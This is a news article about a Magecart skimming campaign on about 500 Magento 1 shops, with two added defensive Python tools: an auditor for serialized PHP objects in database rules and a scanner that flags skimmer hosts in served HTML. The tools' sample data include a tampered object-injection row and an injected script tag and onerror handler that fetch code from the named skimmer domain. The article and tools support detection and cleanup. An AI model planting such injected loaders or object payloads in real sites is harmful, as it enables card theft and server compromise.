Hackers compromised hundreds of e-commerce websites to steal payment information


About 500 e-commerce websites were recently found to have been compromised by hackers who installed stealthy credit card skimmers that steal sensitive data when visitors attempt to make purchases.

A report published on Tuesday is only the latest involving Magecart, an umbrella term for the competing criminal groups that infect e-commerce sites with skimmers. Over the past few years, thousands of sites have been hit by exploits that cause them to run malicious code. When a visitor enters payment card details during a purchase, that code sends the information to servers controlled by the attackers.

Sansec, the security company that discovered the latest wave of infections, said the compromised websites were loading malicious scripts hosted on the naturalfreshmall[.]com domain.

“The Natural Fresh skimmer displays a fake payment popup, defeating the security of a hosted (PCI-compliant) payment form,” the company’s researchers wrote on Twitter. “Payments are sent to https://naturalfreshmall[.]com/Payment/Payment.php.”

The hackers then modified existing files or created new ones that provided no fewer than 19 backdoors, which they could use to keep control of the websites even if the malicious script was detected and removed and the vulnerable software was updated. The only way to fully disinfect a site is to identify and remove those backdoors before updating the vulnerable CMS that allowed the site to be hacked in the first place; patching alone leaves the attackers’ access in place.

Sansec worked with the administrators of the hacked sites to determine the common entry point used by the attackers. The researchers eventually determined that the attackers combined a SQL injection exploit with a PHP object injection attack in a Magento plug-in called Quickview. The chain allowed the attackers to execute malicious code directly on the web server.

They achieved this code execution by abusing Quickview to add a validation rule to the customer_eav_attribute table, inserting a payload that tricked the host application into creating a malicious object. They then registered as a new user on the site.

“However, simply adding it to the database will not run the code,” the Sansec researchers explained. “Magento actually needs to unserialize the data. And here is the clever twist of this attack: by using validation rules for new customers, an attacker can trigger an unserialize simply by browsing the Magento registration page.”
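The injection point described above can be audited from the database side. What follows is an added example, not Sansec's or Magento's code: a small parser for PHP's serialize() format, run over rows from the validate_rules column of customer_eav_attribute (the column name is taken from the Magento 1 schema and should be confirmed against your installation). Legitimate validate_rules values are serialized arrays of scalar settings; any embedded object (an `O:` token) is out of place and is exactly what a later unserialize() call will instantiate. The sample rows are constructed, and the class name Example_Gadget is a placeholder, since the page does not identify the gadget the attackers used.

```python
# Added example: audit Magento 1 customer_eav_attribute.validate_rules for
# serialized PHP objects. Not code from Sansec or Magento; column name and
# sample rows are assumptions/constructed data.

class PhpSerializedParser:
    """Minimal recursive-descent parser for PHP serialize() output.

    Feed it latin-1 decoded text so that one character equals one byte,
    because PHP string lengths are byte counts.
    """

    def __init__(self, data: str):
        self.data = data
        self.pos = 0
        self.classes: list[str] = []   # class names of every object seen

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError(f"trailing data at offset {self.pos}")
        return value

    def _expect(self, token: str) -> None:
        if not self.data.startswith(token, self.pos):
            raise ValueError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, stop: str) -> str:
        end = self.data.find(stop, self.pos)
        if end < 0:
            raise ValueError(f"unterminated token at offset {self.pos}")
        token = self.data[self.pos:end]
        self.pos = end + 1
        return token

    def _string(self) -> str:
        # <len>:"<bytes>"  (the length prefix is trusted only for slicing)
        length = int(self._read_until(':'))
        self._expect('"')
        s = self.data[self.pos:self.pos + length]
        self.pos += length
        self._expect('"')
        return s

    def _pairs(self, count: int) -> dict:
        # {key;value;key;value;...} used by both arrays and objects
        self._expect('{')
        out = {}
        for _ in range(count):
            key = self._value()
            out[key] = self._value()
        self._expect('}')
        return out

    def _value(self):
        if self.pos >= len(self.data):
            raise ValueError("unexpected end of data")
        kind = self.data[self.pos]
        self.pos += 1
        if kind == 'N':                 # N;
            self._expect(';')
            return None
        self._expect(':')
        if kind == 'b':                 # b:1;
            return self._read_until(';') == '1'
        if kind == 'i':                 # i:42;
            return int(self._read_until(';'))
        if kind == 'd':                 # d:3.14;
            return float(self._read_until(';'))
        if kind == 's':                 # s:5:"hello";
            s = self._string()
            self._expect(';')
            return s
        if kind == 'a':                 # a:2:{...}
            return self._pairs(int(self._read_until(':')))
        if kind == 'O':                 # O:8:"Class":1:{...}
            cls = self._string()
            self._expect(':')
            self.classes.append(cls)    # the thing an auditor cares about
            props = self._pairs(int(self._read_until(':')))
            return {'__class__': cls, **props}
        raise ValueError(f"unsupported type {kind!r} at offset {self.pos - 1}")


def find_serialized_objects(rows):
    """rows: iterable of (attribute_code, validate_rules) dumped from
    customer_eav_attribute. Returns a list of (attribute_code, detail)."""
    findings = []
    for attribute_code, validate_rules in rows:
        if not validate_rules:
            continue
        parser = PhpSerializedParser(validate_rules)
        try:
            parser.parse()
        except ValueError as exc:
            findings.append((attribute_code, f"unparseable validate_rules ({exc})"))
            continue
        for cls in parser.classes:
            findings.append((attribute_code, f"serialized object of class {cls}"))
    return findings


# Constructed sample rows: a normal rule set, a tampered one with an object
# nested inside the array, and an empty one. Example_Gadget is a placeholder.
SAMPLE_ROWS = [
    ("firstname", 'a:2:{s:15:"max_text_length";i:255;s:15:"min_text_length";i:1;}'),
    ("lastname", 'a:2:{s:15:"max_text_length";i:255;s:6:"gadget";'
                 'O:14:"Example_Gadget":1:{s:3:"cmd";s:2:"id";}}'),
    ("dob", None),
]

if __name__ == "__main__":
    for code, detail in find_serialized_objects(SAMPLE_ROWS):
        print(f"{code}: {detail}")
```

Run it over the output of `SELECT attribute_code, validate_rules FROM customer_eav_attribute` from a database dump; a row that fails to parse is worth a look as well, since attackers do not always produce clean serialized data. On the application side, PHP 7 and later accept `unserialize($data, ['allowed_classes' => false])`, which refuses to instantiate any object, so a stored rule set like the tampered row above would come back as an `__PHP_Incomplete_Class` rather than a live gadget.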

It is not hard to find sites that are still infected more than a week after Sansec first reported the campaign on Twitter. At the time this post went live, Bedexpress[.]com still contained an HTML attribute that pulls JavaScript from the fake naturalfreshmall[.]com domain.

The hacked sites were running Magento 1, a version of the e-commerce platform that reached end of life in June 2020. The safer bet for any site still using this deprecated platform is to upgrade to the latest version of Adobe Commerce. Another option is to apply the available open source patches for Magento 1, either as a do-it-yourself job using the OpenMage project or with commercial support from Mage-One.

In general, it is difficult for shoppers to spot a payment card skimmer without special training. One option is to use antivirus software such as Malwarebytes, which checks in real time the JavaScript served by a visited website. Shoppers may also want to stay away from websites that appear to be running outdated software, although that hardly guarantees that a site is secure.
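The infected-page check and the real-time JavaScript check discussed above can be approximated with a scan of the served HTML. The following is an added example, not Sansec's code or Malwarebytes' product: it walks a page with the standard-library HTML parser, extracts every host referenced from tag attributes (src=, href=, and inline handlers such as onerror=) and from inline script bodies, and reports known skimmer hosts and, separately, any host that is not the shop's own. The shop hostname shop.example, the CDN host, and the sample page with its script paths are all constructed; the page gives only the skimmer host, not its loader path.

```python
# Added example: flag skimmer and third-party hosts referenced from a page.
# Not Sansec's code. Shop hostname, CDN host and the sample page are constructed.
import re
from html.parser import HTMLParser

# Defanged in the article text; refanged here only so the comparison works.
SKIMMER_HOST = "naturalfreshmall[.]com".replace("[.]", ".")
IOC_DOMAINS = {SKIMMER_HOST}

# Host part of absolute (https://h/...) or protocol-relative (//h/...) URLs.
URL_HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+)")


class SkimmerReferenceScanner(HTMLParser):
    def __init__(self, first_party: str, ioc_domains=IOC_DOMAINS):
        super().__init__()
        self.first_party = first_party.lower()
        self.ioc = {d.lower() for d in ioc_domains}
        self.findings = []          # (severity, host, where)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        # Every attribute is checked, so src= and href= are covered as well as
        # inline handlers such as onerror= that build a <script> element.
        for name, value in attrs:
            if value:
                self._check_text(value, f"<{tag} {name}=...>")
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script:
            self._check_text(data, "inline <script> body")

    def _check_text(self, text, where):
        for host in URL_HOST_RE.findall(text):
            self._classify(host.lower(), where)

    @staticmethod
    def _matches(host, domain):
        return host == domain or host.endswith("." + domain)

    def _classify(self, host, where):
        if any(self._matches(host, d) for d in self.ioc):
            self.findings.append(("ioc", host, where))
        elif not self._matches(host, self.first_party):
            self.findings.append(("third-party", host, where))


def scan_html(html: str, first_party: str, ioc_domains=IOC_DOMAINS):
    """Return [(severity, host, where)] for every non-first-party reference."""
    scanner = SkimmerReferenceScanner(first_party, ioc_domains)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page for a fictional shop. The skimmer paths are
# placeholders; the article names only the host.
SAMPLE_PAGE = f"""<html><head>
<script src="https://shop.example/js/app.js"></script>
<script src="https://cdn.example.net/jquery.min.js"></script>
<script src="https://{SKIMMER_HOST}/static/loader.js"></script>
</head><body>
<img src="/media/logo.png" onerror="var s=document.createElement('script');s.src='//{SKIMMER_HOST}/static/fallback.js';document.head.appendChild(s)">
<a href="https://shop.example/checkout">Checkout</a>
</body></html>"""

if __name__ == "__main__":
    for severity, host, where in scan_html(SAMPLE_PAGE, "shop.example"):
        print(f"[{severity}] {host} via {where}")
```

Fetch the checkout and registration pages (the pages a skimmer cares about) and feed them in. A third-party host is not proof of compromise, since CDNs and payment providers are legitimate, but an unfamiliar host on a checkout page deserves a look, and a known IOC host is disqualifying. This is a point-in-time check of the HTML as served; a skimmer that is injected only for some visitors, or loaded by a script that is already on the page, will not show up in it, which is why the in-browser checking the paragraph above describes catches more.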

This story originally appeared on Ars Technica.

